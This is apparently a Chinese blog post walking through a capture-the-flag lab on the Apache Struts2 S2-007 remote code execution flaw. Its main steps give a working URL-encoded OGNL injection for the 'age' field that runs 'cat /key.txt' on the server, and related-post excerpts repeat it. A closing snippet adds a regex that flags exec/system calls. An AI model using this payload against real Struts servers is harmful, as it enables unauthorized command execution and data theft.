墨者学院_Apache Struts2远程代码执行漏洞(S2-007)复现

最新推荐文章于 2024-09-21 16:31:24 发布
最新推荐文章于 2024-09-21 16:31:24 发布
阅读量1.1w 收藏
点赞数
文章标签: 墨者学院 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cc_de_csdn/article/details/100070897
版权
  1. 打开靶场,任意填写表单并提交
  2. 使用BrupSuite捕获报文
  3. 修改age的值为:
  4. %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat /key.txt%27%29.getInputStream%28%29%29%29+%2B+%27
  5. 得到KEY
cc_de_csdn
关注
CTF-Apache Struts2远程代码执行漏洞(S2-007)复现
asd158923328的博客
08-21 519
根据题意 形成原因:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。 进入环境,查看源码, 限制了三个输入框的的值只能为text,而且长度在540以上, 然后在登录界面用户名和邮箱值随意,age部分改为我们的payload ’ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java...
Struts2 漏洞复现之s2-007
weixin_51220765的博客
12-14 1218
Struts2 漏洞复现之s2-007 原理: age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞 1.到007下 cd vulhub-master/struts2/s2-007 2.启动007 docker-compose up -d 3.访问靶机ip:8080 注意:如果此时报404错误,不要慌哦~ 我们去浏览器的历史记录里清除一下缓存,然后刷新一下页面就好了!具体步骤如下: 当页面回复正常后,我们就可以继续进行咯~ 3
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 8000
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
Struts S2-007复现
ZJT6666666的博客
12-21 541
Struts S2-007复现
S2-007漏洞复现
baidu_38844729的博客
11-14 348
漏洞原理 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 影响版本:Struts2 2.0.0 - Struts2 2.2.3 漏洞利用 访问页面 http://local...
Apache Struts2远程代码执行漏洞(S2-001)复现
2401_87298694的博客
09-21 851
​ OGNL还支持处理集合即Map,List和Set。​ 除了#,% 在 OGNL 表达式中也经常出现,它提供一个OGNL表达式运行环境。
墨者学院-Apache Struts2远程代码执行漏洞(S2-015)复现
JimWu的博客
09-04 2132
Apache Struts2远程代码执行漏洞(S2-015)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 1.打开靶场,测试是否存在漏洞。 输入/${1+1}.action...
墨者学院-Apache Struts2远程代码执行漏洞(S2-019)复现
JimWu的博客
09-04 1211
Apache Struts2远程代码执行漏洞(S2-019)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理:默认情况下禁用动态方法调用导致的命令执行。 1.打开靶场,搜索一下S2-019漏洞原理。 2.构造POC,执行命令ls查看文件。 进行url二次编码。 ?debug=command&expression=%23f%3D%23_memberAcces...
墨者学院-Apache Struts2远程代码执行漏洞(S2-029)复现
JimWu的博客
09-04 1160
Apache Struts2远程代码执行漏洞(S2-029)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理:由于在标记属性中对原始用户输入进行评估时,强制双OGNL评估导致远程代码执行。 1.打开靶场,了解一下S2-029漏洞的原理。 2.构造POC,执行命令ls查看文件。 (#_memberAccess[‘allowPrivateAcces...
墨者学院-Apache Struts2远程代码执行漏洞(S2-005)复现
JimWu的博客
09-04 668
Apache Struts2远程代码执行漏洞(S2-005)复现 难易程度:★★ 题目类型:命令执行 使用工具:k8 漏洞原理:OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码或8进制即绕过了安全限制。 1.打开靶场,了解s2-005漏洞原理 2.构造poc ?(‘u0023context[‘xwork.MethodAccesso...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.322.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Struts2之拦截器原理分析及使用-上案例struts007
11-26
参考博文:http://blog.youkuaiyun.com/u011638419/article/details/41510483
漏洞复现----29、Struts2/S2-007
七天
06-29 1833
影响版本 2.0.0 - 2.2.3 漏洞原理 参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 当配置了验证规则 -validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction: () public class UserAction extends Ac
vulhub-struts2-S2-007 远程代码执行漏洞复现
qq_56426046的博客
06-19 350
影响版本: 2.0.0 - 2.2.3。
『Java安全』Struts 2.2.3 表单参数类型转换错误OGNL注入漏洞S2-007复现与浅析
Ho1aAs‘s Blog
08-25 577
对表单参数使用validator验证时,如果遇到类型错误,参数值会先压入参数栈,之后会取出并被二次ognl解析。
墨者学院-Apache Struts2远程代码执行漏洞(S2-007)复现
JimWu的博客
09-04 905
Apache Struts2远程代码执行漏洞(S2-007)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 当提交表单中变量的类型出现错误时,进行了错误的字符串拼接,后端会执行OGNL表达式。 1.打开靶场,了解S2-007漏洞是当提交表单中变量的类型出现错误时,进行了错误的字符串拼接,后端会执行OGNL表达式。 2.测试一下哪个输入框存在漏洞。 最下的输...
s2系列——s2-007,s2-008,s2-009复现
qq_54030686的博客
03-02 6857
s2-007,s2-008,s2-009复现 简而言之就是payload的输入,具体复现这里不再复现,相关博文,也有蛮多,这里更新下脚本 s2-007 def s2007(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http': 'http://' + proxy, 'https': 'https://' + proxy }
【vulhub】s2-007远程代码执行漏洞
热门推荐
qq_45300786的博客
07-08 2万+
poc %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.l
struts2-S2-007
jjjj1029056414的博客
11-12 67
struts2-S2-007
墨者学院WebShell文件上传漏洞分析溯源(第1题)
最新发布
04-03
### 墨者学院 WebShell 文件上传漏洞分析与溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕过安全机制,在服务器上放置恶意脚本。 在墨者学院的相关题目中提到的内容涉及多个方面,包括 MIME 类型篡改、禁用 JavaScript 绕过前端验证以及利用后缀名规避检测等技术[^1]。 --- #### 漏洞成因分析 文件上传漏洞的主要原因在于服务端对上传文件的安全校验不足。具体表现为以下几个方面: 1. **MIME 类型校验不严格** 攻击者可以使用工具(如 Burp Suite)抓取 HTTP 请求并修改其 MIME 类型字段,从而绕过基于内容类型的限制。例如,将 `.txt` 文件伪装为 `image/jpeg` 格式的图片文件。 2. **依赖客户端验证** 如果仅依靠浏览器端的 JavaScript 验证来阻止非法文件类型,则容易被禁用或绕过。一旦禁用了 JavaScript 功能,就可以轻松提交不符合预期规则的文件[^2]。 3. **扩展名校验缺陷** 当某些应用只检查文件名而未深入解析实际内容时,可能会接受带有特殊后缀名(比如 `.php5`, `.pht` 等变种 PHP 扩展)的文件作为合法输入[^3]。这使得即使表面上看似正常的文件也可能隐藏潜在威胁。 --- #### 解决方案建议 为了有效防范此类问题的发生,可以从以下几方面着手改进防护措施: - 加强服务端逻辑设计, 不应单纯信任来自用户的任何数据; - 对于上传过程实施多重过滤策略, 如限定白名单内的 mime-type 和尺寸范围之外还需确认最终存储形式确实无害; - 定期审查现有代码库寻找可能存在的安全隐患点,并及时修补已知漏洞; 以下是实现上述部分功能的一个 Python 示例演示如何初步判断一个给定字符串是否可能是危险命令执行语句的一部分: ```python import re def is_potentially_dangerous(input_string): pattern = r'(?:exec|passthru|shell_exec|system|proc_open|popen)' match_result = re.search(pattern, input_string.lower()) return bool(match_result) test_strings = ["<?php echo 'hello'; ?>", "<?php system('ls'); ?>"] for s in test_strings: print(f"'{s}' -> {is_potentially_dangerous(s)}") ``` 此函数会返回 True 或 False 表明传入参数是否存在可疑的关键字组合。 --- #### 总结 通过对墨者学院案例的学习可以看出,针对 web shell 的防御工作需要综合考虑多层面的因素,从前端界面交互直至后台数据库操作均需保持高度警惕以防万一环节疏漏造成严重后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值